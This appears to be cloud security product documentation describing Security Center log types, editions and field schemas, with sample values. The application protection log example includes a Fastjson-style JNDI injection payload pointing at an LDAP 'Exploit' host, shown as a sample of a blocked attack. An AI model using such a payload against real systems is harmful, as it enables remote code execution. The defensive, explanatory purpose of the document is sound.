The log analysis feature of Security Center provides centralized storage, query, and analysis of host activities and security events to facilitate security audits, event tracing, and threat discovery. This topic describes the log types that Security Center supports, the differences between editions, the log fields, and provides query examples.
Supported logs
Subscription
Host logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Security logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Note Only alerts supported by the Free Edition are recorded. | ||||
Vulnerability logs | Note Only vulnerabilities supported by the Free Edition are recorded. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Value-added service logs
If you enable the following value-added services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check logs and CSPM logs)
Pay-as-you-go
If you purchase the Host and Container Security pay-as-you-go service, the supported log types vary depending on the protection level that is bound to the server.
Host logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Security logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Note Only alerts supported for the Unprotected level are recorded. | |||
Vulnerability logs | Note Only vulnerabilities at the Unprotected level are recorded. | |||
Network defense logs | ||||
Core file monitoring event logs |
Pay-as-you-go service logs
If you enable the following pay-as-you-go services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check and CSPM logs)
Log type descriptions
The following log samples and field descriptions are for reference only. The specific fields are subject to change with product updates. For the most accurate information, refer to the data collected in Simple Log Service.
Host logs
__topic__:
aegis-log-loginLog content: Records user logon events on servers, including the source IP address, username, and logon result.
Description: Helps you monitor user activities and promptly identify and respond to abnormal behavior.
ImportantSecurity Center does not support collecting logon logs for the Windows Server 2008 operating system.
Collection period: Real-time.
__topic__:
aegis-log-networkLog content: Records network connection activities on the server in real time, including information such as the connection 5-tuple and associated processes.
Description: Helps you discover abnormal connection behavior, identify potential network attacks, and optimize network performance.
ImportantThe server collects only some connection statuses from establishment to termination.
Inbound traffic is not recorded.
Collection period: Real-time.
__topic__:
aegis-log-processLog content: Records startup events for all new processes on the server, including information such as the process name, command-line parameters, and the parent process.
Description: Helps you understand the startup status and configuration of processes in the system and detect issues such as abnormal process activities, malware intrusions, and security threats.
Collection period: Real-time. Logs are reported immediately after a process starts.
__topic__:
aegis-log-crackLog content: Records brute-force attack behavior, including information about attempts to log on to and crack systems, applications, or accounts.
Description: Helps you identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks. These logs also support event response and forensic analysis.
Collection period: Real-time.
__topic__:
aegis-snapshot-hostLog content: Records detailed information about user accounts in a system or application, including basic account properties such as the username, password policy, and logon history.
Description: By comparing snapshots from different points in time, you can monitor account changes and promptly detect security issues such as unauthorized access and abnormal account statuses.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-snapshot-portLog content: Records network connection information, including the connection 5-tuple, connection status, and associated processes.
Description: Helps you understand the active network connections in your system, discover abnormal connection behavior, and identify potential network attacks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-snapshot-processLog content: Records process activities in the system, including the process ID, name, and startup time.
Description: Use these logs to understand process activities and resource usage, and detect issues such as abnormal processes, high CPU usage, and memory leaks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-log-dns-queryLog content: Records DNS query requests that are initiated by the server, including information such as the queried domain name, query type, and source.
ImportantLog collection is not supported for Linux servers with a kernel version earlier than 4.X.X.
Description: Use these logs to analyze DNS activities and detect issues such as abnormal queries, domain hijacking, and DNS pollution.
Collection period: Real-time.
__topic__:
aegis-log-clientLog content: Records the online and offline events of the Security Center agent.
Description: Helps you monitor the running status of the Security Center agent.
Collection period: Real-time.
Security logs
All security logs are collected in real time.
__topic__:
sas-vul-logLog content: Records information about vulnerabilities that are found in your systems or applications, including the vulnerability name, status, and handling action.
Description: Helps you understand the vulnerabilities, security risks, and attack trends in your system so that you can take timely remediation measures.
__topic__:
sas-hc-logLog content: Records the results of baseline risk checks, including information such as the baseline level, category, and risk level.
ImportantOnly the data of check items that fail for the first time is recorded. Data for check items that previously passed but fail a new check is also recorded.
Description: Helps you understand the baseline security status and potential risks of your system.
__topic__:
sas-security-logLog content: Records security events and alerts that occur in your system or application, including the alert data source, details, and alert level.
Description: Helps you understand the security events and threats in your system so that you can take appropriate response measures.
CSPM - Cloud platform configuration check logs
__topic__:
sas-cspm-logLog content: Records information such as cloud platform configuration check results and whitelisting operations.
Description: Helps you understand configuration issues and potential security risks in your cloud platform.
__topic__:
sas-net-blockLog content: Records network attack events, including key information such as the attack type and source/destination IP addresses.
Description: Helps you understand security events on your network so that you can take response and defense measures to improve network security.
__topic__:
sas-rasp-logLog content: Records attack alert information from Runtime Application Self-Protection (RASP), including the attack type, behavioral data, and attacker IP address.
Description: Helps you understand security events in your application so that you can take response and defense measures to improve application security.
__topic__:
sas-filedetect-logLog content: Records detection results from the malware detection software development kit (SDK), including file information, detection scenario, and results.
Description: Helps you identify and promptly handle malicious programs in offline files or cloud storage.
Core file monitoring event logs
__topic__:
aegis-file-protect-logLog content: Records alert events that are detected by the core file monitoring feature, including the file path, operation type, and alert level.
Description: Helps you monitor whether core files are stolen or tampered with.
__topic__:
sas-agentless-logLog content: Records security risks that are detected in cloud servers, disk snapshots, and images. These risks include vulnerabilities, baselines, malicious samples, and sensitive files.
Description: Helps you view the security risk status of your assets over different time periods to identify and respond to potential threats.
Host log fields
Logon logs
Field | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | The source IP address for the logon. | 221.11.XX.XX |
dst_port | The logon port of the server. | 22 |
login_type | The logon type. Valid values include but are not limited to:
| SSH |
username | The logon username. | admin |
login_count | The number of logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Network connection logs
Field | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values:
| in |
dst_ip | The IP address of the network connection receiver.
| 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The filename of the parent process. | /usr/bin/bash |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The process name. | nginx |
proc_path | The process path. | /usr/local/nginx/sbin/nginx |
proc_start_time | The startup time of the process. | N/A |
connection_type | The protocol. Valid values:
| tcp |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the grandparent process. | containerd-shim |
status | The network connection status. Valid values:
| 5 |
type | The type of real-time network connection. Valid values:
| listen |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Process startup logs
Field | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
cmd_index | The index of each parameter in the command line. Each pair of indexes indicates the start and end of a parameter. | 0,3,5,8 |
cmdline | The full command line for starting the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name associated with the process. | N/A |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
cwd | The directory where the process is running. | N/A |
proc_name | The process filename. | ipset |
proc_path | The full path of the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The user group. | group1 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The parent process filename. | kube-proxy |
parent_proc_path | The full path of the parent process file. | /usr/local/bin/kube-proxy |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The process startup time. | 2024-08-01 16:45:40 |
parent_proc_start_time | The startup time of the parent process. | 2024-07-12 19:45:19 |
sas_group_name | The asset group of the server in Security Center. | default |
srv_cmd | The command line of the grandparent process. | /usr/bin/containerd |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
uid | The user ID. | 123 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Brute-force attack logs
Field | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is subject to brute-force attacks. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server that is subject to brute-force attacks. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
src_ip | The source IP address for the logon. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values:
| SSH |
username | The logon username. | user |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Account snapshot logs
Field | Description | Example |
account_expire | The expiration time of the account. never indicates that the account never expires. | never |
domain | The domain or directory service to which the account belongs. N/A indicates that the account does not belong to any domain. | N/A |
groups | The group to which the account belongs. N/A indicates that the account does not belong to any group. | ["nscd"] |
home_dir | The home directory. This is the default location for storing and managing files in the system. | /Users/abc |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon to the account. N/A indicates that the account has never been logged on to. | 2023-08-18 09:21:21 |
login_ip | The remote IP address of the last logon to the account. N/A indicates that the account has never been logged on to. | 192.168.XX.XX |
passwd_expire | The expiration date of the password. never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values:
| 0 |
sas_group_name | The asset group of the server in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the user account. Valid values:
| 0 |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
username | The username. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date for the password expiration reminder. never indicates that a reminder is never sent. | 2024-08-20 |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Network snapshot logs
Field | Description | Example |
net_connect_dir | The direction of the network connection. Valid values:
| in |
dst_ip | The IP address of the network connection receiver.
| 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The process ID. | 682 |
proc_name | The process name. | sshd |
connection_type | The protocol. Valid values:
| tcp4 |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The network connection status. Valid values:
| 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Process snapshot logs
Field | Description | Example |
cmdline | The full command line for starting the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash of the binary file. Note The MD5 hash is not calculated for process files larger than 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The process filename. | assist_daemon |
proc_path | The full path of the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The process ID. | 1692 |
pname | The parent process filename. | systemd |
sas_group_name | The asset group of the server in Security Center. | default |
proc_start_time | The process startup time. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
DNS request logs
Field | Description | Example |
domain | The domain name corresponding to the DNS request. | example.aliyundoc.com |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiated the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiated the DNS request. | 3544 |
ppid | The ID of the parent process that initiated the DNS request. | 3408 |
cmd_chain | The process chain that initiated the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line that initiated the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path of the process that initiated the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group of the server in Security Center. | default |
time | The time when the DNS request event was captured. This time is generally the same as the time when the DNS request occurred. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiated the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Agent event logs
Field | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The agent version. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The operating system type. Valid values:
| linux |
region_id | The ID of the region where the server resides. | cn-beijing |
status | The agent status. Valid values:
| online |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Security log fields
Vulnerability logs
Field | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values:
| later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
instance_name | The hostname. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The action performed on the vulnerability. Valid values:
| new |
status | The status. Valid values:
| 1 |
tag | The tag of the vulnerability. Valid values:
| oval |
type | The vulnerability type. Valid values:
| sys |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
CSPM - Baseline check logs
Field | Description | Example |
check_item_name | The name of the check item. | Set minimum interval for password changes |
check_item_level | The check level of the baseline. Valid values:
| medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
risk_level | The level of the risk item. Valid values:
| medium |
operation | The operation. Valid values:
| new |
risk_name | The name of the risk item. | Password policy compliance check |
sas_group_name | The asset group of the server on which the risk item is detected in Security Center. | default |
status | The status. Valid values:
| 1 |
sub_type_alias_name | The alias of the subtype. | International security best practices - Ubuntu 16/18/20/22 security baseline check |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the type. | International security best practices |
type_name | The baseline type. For more information about the valid values of the baseline type, see List of baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security alert logs
Field | Description | Example |
data_source | The data source. Valid values:
| aegis_login_log |
detail | A JSON object that provides detailed context for the alert. The fields in this object vary based on the alert type. The following describes common fields of the
| {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
level | The risk level of the alert event. Valid values:
| suspicious |
name | The alert name. | Anomalous Logon - Unusual Account Logon to ECS |
operation | The operation. Valid values:
| new |
status | The status of the alert. Valid values:
| 1 |
unique_info | The unique identifier of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server that generated the alert. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
suspicious_event_id | The alert event ID. | 650226318 |
handle_time | The time corresponding to the operation. | 1765272845 |
alert_first_time | The time when the alert first occurred. | 1764226915 |
alert_last_time | The time when the alert last occurred. | 1765273425 |
strict_type | Indicates whether the alert is a strict mode alert. Valid values: true, false. | |
user_id | The account ID. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Field | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to obtain the ID. | 11 |
check_item_name | The name of the check item. | Origin fetch configuration |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
instance_name | The instance name. | lsm |
instance_result | The impact of the risk. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values:
| INSTANCE |
instance_type | The instance type. Valid values:
| ECS |
region_id | The ID of the region where the instance resides. | cn-hangzhou |
requirement_id | The requirement ID. You can call the ListCheckStandard operation to obtain the ID. | 5 |
risk_level | The risk level. Valid values:
| MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to obtain the ID. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to obtain the ID. | 1 |
status | The status of the check item. Valid values:
| PASS |
vendor | The cloud service provider. The value is fixed to ALIYUN. | ALIYUN |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network defense logs
Field | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The payload converted from HEX format to characters. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the intercepted event. Valid values:
| payload |
rule_type | The specific rule type of the intercepted event. Valid values:
| alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | The defense action mode. The value is block (intercepted). | block |
payload | The payload in HEX format. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The system type of the attacked asset. Valid values:
| linux |
proc_path | The path of the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address that initiated the attack. | 106.11.XX.XX |
src_port | The source port that initiated the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Application protection logs
Field | Description | Example |
app_dir | The directory where the application resides. | /usr/local/aegis/rasp/apps/1111 |
app_id | The application ID. | 6492a391fc9b4e2aad94**** |
app_name | The application name. | test |
confidence_level | The confidence level of the detection algorithm. Valid values:
| low |
request_body | The request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The hook point parameters. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log was truncated because it was too long. Valid values:
| false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The alert description. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The operating system type. | Linux |
arch | The operating system architecture. | amd64 |
kernel_version | The operating system kernel version. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameters. Common formats include the following:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The unique ID of the application protection probe. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the application protection probe. | 0.8.5 |
src_ip | The IP address of the requester. | 172.0.XX.XX |
final_action | The alert handling result. Valid values:
| block |
rule_action | The alert handling method specified by the rule. Valid values:
| block |
risk_level | The risk level. Valid values:
| high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was triggered. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was triggered, in milliseconds. | 1696835955070 |
type | The attack type. Valid values:
| rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack event. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The host UUID. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The name of the server group in Security Center. | Group 1 |
instance_id | The host instance ID. | i-wz995eivg28f1m** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Malware detection logs
Field | Description | Example |
bucket_name | The bucket name. | ***-test |
event_id | The alert ID. | 802210 |
event_name | The alert name. | Mining program |
md5 | The MD5 hash of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA256 hash of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values:
| 0 |
file_path | The file path. | test.zip/bin_test |
etag | The OSS file identifier. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values:
| remind |
source | The detection scenario. Valid values:
| OSS |
parent_md5 | The MD5 hash of the parent file or compressed package. | 3d0f8045bb9****** |
parent_sha256 | The SHA256 hash of the parent file or compressed package. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or compressed package. | test.zip |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Core file monitoring event logs
Field | Description | Example |
start_time | The most recent time the event occurred. Unit: seconds. | 1718678414 |
uuid | The UUID of the agent. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The file path. | /etc/passwd |
proc_path | The process path. | /usr/bin/bash |
rule_id | The ID of the rule that was hit. | 123 |
rule_name | The rule name. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation on the file. | READ |
risk_level | The alert level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The process permissions. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field | Description | Example |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Vulnerability risk fields
Field | Description | Example |
vul_name | The name of the vulnerability. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | The alias of the vulnerability. | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | The primary key ID of the vulnerability. | 990174361 |
type | The vulnerability type. Valid values:
| sca |
alert_level | The risk level of the vulnerability. Valid values:
| asap |
instance_name | The hostname. | hhht-linux-*** |
operation | The action performed on the vulnerability. Valid values:
| new |
status | The status of the vulnerability. Valid values:
| 1 |
tag | The tag of the vulnerability. Valid values:
Note The tags for other vulnerability types are random strings. | oval |
Baseline check fields
Field | Description | Example |
check_item_name | The name of the check item. | Set password expiration time |
check_item_level | The risk level of the check item. Valid values:
| high |
check_type | The type of the check item. | Identity authentication |
risk_level | The level of the risk item. Valid values:
| low |
operation | The operation. Valid values:
| new |
risk_name | The name of the risky check item. | Password policy compliance check |
status | The status of the check item. Valid values:
| 1 |
sub_type_alias_name | The alias of the subtype. | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_centos7 |
type_name | The type name. | hc_best_secruity |
type_alias_name | The alias of the type. | Best practices |
container_id | The container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | The container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field | Description | Example |
alert_level | The risk level of the alert event. Valid values:
| suspicious |
alert_name | The name of the malicious sample alert. | Suspicious Process-SSH-based |
operation | The operation. Valid values:
| new |
status | The risk status of the malicious sample. Valid values:
| 0 |
suspicious_event_id | The alert event ID. | 909361 |
Sensitive file fields
Field | Description | Example |
alert_level | The risk level. Valid values:
| high |
rule_name | The file type name. | Ionic token |
file_path | The path of the sensitive file. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | The check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
List of baseline types and subtypes
Type name | Subtype name | Description |
hc_exploit | hc_exploit_redis | Important threat exploit: Unauthorized access to Redis |
hc_exploit_activemq | Important threat exploit: Unauthorized access to ActiveMQ | |
hc_exploit_couchdb | Important threat exploit: Unauthorized access to CouchDB | |
hc_exploit_docker | Important threat exploit: Unauthorized access to Docker | |
hc_exploit_es | Important threat exploit: Unauthorized access to Elasticsearch | |
